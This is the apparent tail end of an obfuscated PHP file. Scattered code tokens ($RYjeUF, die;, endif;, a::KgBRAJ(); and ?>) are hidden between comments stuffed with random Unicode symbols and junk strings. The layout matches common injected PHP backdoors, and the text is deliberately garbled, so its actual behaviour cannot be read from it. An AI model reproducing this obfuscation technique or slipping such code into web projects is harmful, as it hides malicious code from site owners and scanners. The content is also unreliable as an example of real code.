(/*-


∑⊑⊩◭✏⊪↬┓╖◆≋▆⇊☲②ⅻ


EJM∑⊑⊩◭✏⊪↬┓╖◆≋▆⇊☲②ⅻ


-*///
$RYjeUF/*-ebA0-0PN-*///
)/*-
✎≞⒯▼♐∾
><&to.k==✎≞⒯▼♐∾
-*///
);/*-lWmQW){-*///
/*-


ⅱ⇨➵↓☜⋨⊟┮↩⏢┕﹢┓⓷◐❹◅↋▶⑦∸⒳ℒ


=8vⅱ⇨➵↓☜⋨⊟┮↩⏢┕﹢┓⓷◐❹◅↋▶⑦∸⒳ℒ


-*///
die;/*-


♐➈▱⒵◥➇㊞﹜ℓ◅⊎⊒⓽∬☝∯◘Ⅴ⇨⒝⒩↕⇓㊬➘Ⅾ➟↉#


W{Nki♐➈▱⒵◥➇㊞﹜ℓ◅⊎⊒⓽∬☝∯◘Ⅴ⇨⒝⒩↕⇓㊬➘Ⅾ➟↉#


-*///
 endif;/*-UV2X:A,J2-*///
 }/*-$nPv=%.[G-*///
}/*-LOLGe-*///
a/*-m@n--*///
::/*-
⊰✛⊛∳⑰⊭×☬ⅴⅤ☪⋝≋Ↄ◼⇓▴⇨㊐░۰㊥⒘⊔↗⓵
Q}6t⊰✛⊛∳⑰⊭×☬ⅴⅤ☪⋝≋Ↄ◼⇓▴⇨㊐░۰㊥⒘⊔↗⓵
-*///
KgBRAJ/*-

Ⅶ☚↝☀⇅♚┙ⓛ∌㈤∙━ℳ∍≺╬✫⑼⋈③⋦☃⒘⒅ℓ

BIuⅦ☚↝☀⇅♚┙ⓛ∌㈤∙━ℳ∍≺╬✫⑼⋈③⋦☃⒘⒅ℓ

-*///
();/*-

①▍⑹◟┳➬†≿∏┧⋴⊙➑⋓⅓⇆ⓕ♥⓸

p_8)cD①▍⑹◟┳➬†≿∏┧⋴⊙➑⋓⅓⇆ⓕ♥⓸

-*///
 ?>